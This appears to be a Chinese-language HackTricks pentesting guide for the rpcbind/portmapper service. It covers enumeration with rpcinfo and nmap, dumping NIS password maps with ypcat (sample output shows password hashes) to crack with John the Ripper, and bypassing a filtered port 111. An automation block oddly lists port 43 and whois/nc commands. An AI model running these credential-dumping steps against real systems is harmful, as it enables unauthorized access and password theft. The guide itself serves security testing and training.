hacktricks/network-services-pentesting/pentesting-rpcbind.md

# 111/TCP/UDP - 渗透测试Portmapper

<details>

<summary><strong>通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>从零开始学习AWS黑客攻击！</strong></summary>

支持HackTricks的其他方式：

* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>

## 基本信息

在基于Unix的系统之间提供信息。该端口经常被探测，它可以用来识别Nix操作系统，并获取有关可用服务的信息。与NFS、NIS或任何基于rpc的服务一起使用的端口。

**默认端口：** 111/TCP/UDP，Oracle Solaris中为32771
```
PORT    STATE SERVICE
111/tcp open  rpcbind
```
## 枚举
```
rpcinfo irked.htb
nmap -sSUC -p111 192.168.10.1
```
有时它不会给你任何信息，其他时候你可能会得到这样的结果：

![](<../.gitbook/assets/image (230).png>)

### Shodan

* `port:111 portmap`

## RPCBind + NFS

如果你发现了NFS服务，那么你可能能够列出和下载（也许还能上传）文件：

![](<../.gitbook/assets/image (232).png>)

阅读[2049 - 测试NFS服务](nfs-service-pentesting.md)以了解如何测试这个协议。

## NIS

如果你发现`ypbind`服务正在运行：

![](<../.gitbook/assets/image (233).png>)

你可以尝试利用它。无论如何，首先你**需要猜测机器的NIS“域名”**（安装NIS时会配置一个“域名”），**如果不知道这个域名，你将无法做任何事情**。

获取到环境的NIS域名（例如在这个案例中是example.org），使用ypwhich命令来ping NIS服务器，并使用ypcat来获取敏感材料。你应该将加密的密码哈希输入到John the Ripper中，一旦破解，你就可以使用它来评估系统访问和权限。
```bash
root@kali:~# apt-get install nis
root@kali:~# ypwhich -d example.org 192.168.10.1
potatohead.example.org
root@kali:~# ypcat –d example.org –h 192.168.10.1 passwd.byname
tiff:noR7Bk6FdgcZg:218:101::/export/home/tiff:/bin/bash
katykat:d.K5tGUWCJfQM:2099:102::/export/home/katykat:/bin/bash
james:i0na7pfgtxi42:332:100::/export/home/james:/bin/tcsh
florent:nUNzkxYF0Hbmk:199:100::/export/home/florent:/bin/csh
dave:pzg1026SzQlwc:182:100::/export/home/dave:/bin/bash
yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash
```
| **主文件**        | **映射**                     | **备注**                             |
| ---------------- | --------------------------- | ------------------------------------ |
| /etc/hosts       | hosts.byname, hosts.byaddr  | 包含主机名和IP详情                   |
| /etc/passwd      | passwd.byname, passwd.byuid | NIS用户密码文件                      |
| /etc/group       | group.byname, group.bygid   | NIS组文件                            |
| /usr/lib/aliases | mail.aliases                | 邮件别名详情                         |

## RPC 用户

如果你发现列表中有 **rusersd** 服务像这样：

![](<../.gitbook/assets/image (231).png>)

你可以枚举该设备的用户。要了解如何操作，请阅读 [1026 - RPC用户枚举](1026-pentesting-rusersd.md)。

## 绕过过滤的Portmapper端口

如果在nmap扫描中你看到像NFS这样的开放端口，但是端口111被过滤了，你将无法利用这些端口。\
但是，如果你能在本地模拟一个portmapper服务，并将NFS端口从你的机器隧道到受害者机器，你将能够使用常规工具来利用这些服务。\
更多信息请参阅 [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc)

## Shodan

* `Portmap`

## 实验室练习

* 在 [**Irked HTB机器**](https://app.hackthebox.com/machines/Irked) 上练习这些技术。

## HackTricks自动命令
```
Protocol_Name: Portmapper    #Protocol Abbreviation if there is one.
Port_Number:  43     #Comma separated if there is more than one.
Protocol_Description: PM or RPCBind        #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for PortMapper
Note: |
Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service.

https://book.hacktricks.xyz/pentesting/pentesting-rpcbind

Entry_2:
Name: rpc info
Description: May give netstat-type info
Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43

Entry_3:
Name: nmap
Description: May give netstat-type info
Command: nmap -sSUC -p 111 {IP}
```
<details>

<summary><strong>从零开始学习AWS黑客攻击直至成为专家，通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>！</strong></summary>

支持HackTricks的其他方式：

* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库**提交PR来分享您的黑客技巧。**

</details>